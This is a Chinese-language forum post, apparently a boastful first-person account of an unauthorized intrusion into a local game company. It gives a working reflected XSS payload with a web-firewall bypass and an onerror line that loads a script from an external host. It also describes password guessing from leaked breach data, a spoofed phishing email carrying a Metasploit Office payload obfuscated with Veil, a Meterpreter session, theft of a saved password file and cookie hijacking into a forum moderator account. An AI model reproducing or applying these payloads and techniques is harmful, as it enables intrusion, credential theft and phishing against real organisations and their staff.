针对当地某游戏公司的小型APT
Author:redrainsite:http://www.fuckgcd.net
0×00背景
这次APT应该算是一次很小的渗透,前后持续了可能两周左右(大概从我去西电比赛回来开始到现在),不过因为比较懒,所以截图也不多,主要是叙述事件
目标是我这里本地的一家游戏公司,号称斥资5000w打造,加上去年我和小伙伴在这家公司领过1w的奖金,所以造成了我对目标公司”人傻钱多速来“的看法,后来因为有一个妹子在此公司上班,有天手贱发了个xss的截图给妹子,妹子顺手给了领导看,领导十分不屑:一个跨站而已,不碍事的。好吧,一个跨站而已=。=闲极无聊就搞搞呗
废话扯完,以下正片
(P.S在本人渗透完成到本文发出时,后门及shell已删)
=====================================================
0×01信息收集
目标公司:XX网络科技有限公司(XX游戏)
URL:http://www.xxxxcom.com
http://www.xxxxcom.cn(公司另一域名)
http://www.xxxxcom.cn.com(公司另一域名)
通过浏览主站和查询whois信息,得知其公司工作邮箱,域名所有人信息,HR联系方式等
结合社工库查询,综合得到目标公司一高管信息
工作邮箱直接查询到了密码,但是输入后提示密码错误,看来修改过,但仔细一看,均为有规律的弱口令
三个数字重复或者是键盘向下的方式组合的口令,于是我果断的决定根据这个规律碰撞一下其他密码试试
经过碰撞,把得到的密码丢到burpsuite重复提交到目标公司网站的登陆界面(本来想登录邮箱的,无奈网易有防止重复提交的策略)
跑了好一阵子,未果,碰撞密码,暂时搁浅
后来想起,whois信息中,域名是xinnet的,于是开心的去查询新网的裤子,不过查询结果很失望,密码依旧不对
至此第一次试探搁浅
0×02对目标网站的测试
目标站点进行cms指纹识别后反应是良精南方的,但是看了看用的是.net的架构,想到去年和小伙伴领1w的原因就是因为发现该站点的漏洞,于是乎又折头看了看,shell已删除,并且管理后台重做过,去年是用的admin.xxxxcom.com做的后台,现在看了看已经重做,只能放弃,不过好在菜刀还有缓存,通过缓存浏览了web目录下的大概情况,有个bbs,一个前台,一个主站,均为.net架构,论坛更是Discuz!NT 3.6.711 出名的难日,浏览缓存后发现某目录下存在一富文本编辑器,访问后结果依旧不尽人意
果断放弃之,然后看了看去年找到的一个主站sql注入
装了新的安全狗,无力去继续绕过waf,放弃=。=
唔,那怎么办呢,接下来就对目标站点进行了FUZZ扫描,哟~好吧,就只扫到我之前说的那个xss,还是反射型的,不过突然想到目标公司的人说不就是个跨站么,这句话让我又不开心了起来,哥今天就拿这个屌丝反射型跨站逆袭给你看!
0×03反射型xss的逆袭之路(伪水坑攻击)
因为装了安全狗,所以要稍微进行攻击代码构造绕过一下
该反射构造的代码如下:
http://www.xxxxcom.com/UserRegister1.aspx?s=%22%3E%3CiMg%20src=N%20onerror=alert%28/test/%29%3E
通过img标签构造iMg大小写的方式绕过,用onerror属性加载
onerror=eval(javascript:document.write(unescape(‘ <script src=”http://xxx.js”></script>’));)
复制代码
对eval操纵的内容进行16进制编码后测试通过
之后进行了第一次攻击尝试
找到客服反馈问题,我说你们游戏的注册页面有问题啊,没办法注册,注册的地址是不是这个啊(然后发了经过短域名处理的攻击url)
一般情况,客服都会来解决问题,但是该公司客服非常奇葩。。。说:哦,我也不知道啊,要不你下载个客户端去注册吧。
经过我机智的对话,仍然没有让其点击连接(给客服大爷您跪了)
第一次水坑攻击尝试失败。。暂时搁浅
0×04第二次信息收集
首次尝试接连受挫,我过了几天在群里打屁,正好那个在这家公司上班的妹子也在,我就顺口问了问公司的情况
大概收集到信息为:
公司员工办公电脑均为win7,文字处理软件有office和wps但是默认使用的是office,公司并没有规定统一
不过好消息是office是默认的,以前看大牛们玩apt的时候都会很流弊的拿出office的漏洞通过邮件攻击搞定一切
做了个简易的接收端,探测公司那边的组件和杀毒软件
通过骗取点击后,接收端收到了session的信息,现在掌握的信息为:
office版本为2007,浏览器为IE8,杀毒软件360,以及IP出口
0×05最后的冲锋,反射型xss终于逆袭
一切基本就绪,天随人愿的是我这里正好也有公网ip
但是有360略蛋疼,不过上次听maple说veil比较牛逼,我office用的payload自然是来自鱼msf,那么就结合veil碰碰运气吧。。
找了个fake-email发伪造邮件
大概内容就是一篇求职的,附带了doc,doc里带了msf生成的
为了保险起见,除了附件有doc外,我还在邮件内容里加了经过短域名处理的xss攻击连接
邮件发过去了,一直开着msf等消息,不过貌似人家周日的时候不上班(这里是我的问题,APT基本上就做一次,不成功便成仁,好险差点因为时间的问题不成功)
吓的我一直开着电脑,第二天大概十点过,msf这边有动静了,好吧,可以返回Meterpreter会话了,总算是摸到了目标公司的设备(尽管只是一台个人电脑)
不过运气真不错,不知道是veil的原因免杀了360还是因为人品比较好当时对方360没有开,反正会话是反弹到了,快速的翻了翻对方的盘符,在文档里找到一份对应用户密码的记录,type了一下快速记录下来后把马删了撤退走人
好消息一个接着一个,之前在邮件内容中写入的短域名xss也被触发了,果断用其cookie登录,不过比较可惜,因为是反射型,对方后台找不到,只登录了前台
通过前台并没有进入后台的地方,但是论坛和前台互通,所以,嘿嘿~~是个超级版主
0×06尾声
之后的事情就不用说了,shell到手,对应用户密码也在个人电脑上扒拉到,呵呵~
最后我溜达了一圈,把shell删了,走人,只为证明反射型xss也是可以屌丝逆袭高富帅的!
写下这篇文章,默默抽根手边的花玉溪,深藏功与名
我了个擦,xss安全狗没拦截? 长见识了,嗯,给力 默默的说我不会xss 呜呜 深藏功与名
我喜欢哈哈
页:
[1]